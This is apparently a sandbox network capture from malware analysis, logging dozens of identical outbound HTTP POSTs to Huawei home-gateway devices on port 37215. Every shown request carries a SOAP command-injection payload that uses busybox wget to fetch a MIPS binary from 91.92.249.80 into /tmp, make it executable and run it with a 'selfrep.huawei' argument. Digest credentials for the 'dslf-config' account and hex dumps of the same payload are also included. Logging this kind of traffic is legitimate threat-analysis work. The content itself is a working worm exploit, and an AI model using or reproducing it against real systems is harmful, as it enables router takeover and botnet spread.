                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          394192.168.2.2335588197.25.241.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.182559967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          395192.168.2.233699241.172.45.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.182591915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          396192.168.2.234423064.118.56.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183074951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          397192.168.2.2358936197.66.44.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183099031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          398192.168.2.2355498110.156.66.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183104038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          399192.168.2.2346476197.179.144.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183151007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          400192.168.2.233733241.73.254.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183152914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          401192.168.2.2344098197.100.213.6537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183223963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          402192.168.2.2340448157.82.189.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183402061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          403192.168.2.2333440197.172.87.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183402061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          404192.168.2.233637241.225.53.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183422089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
